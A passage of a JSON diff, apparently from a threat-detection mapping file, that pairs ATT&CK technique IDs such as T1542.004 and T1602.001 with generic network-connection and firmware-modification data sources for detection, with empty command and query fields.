"collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "firmware" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null + ] + }, + { + "technique_id": "T1542.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + 
"data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "firmware" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1602.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
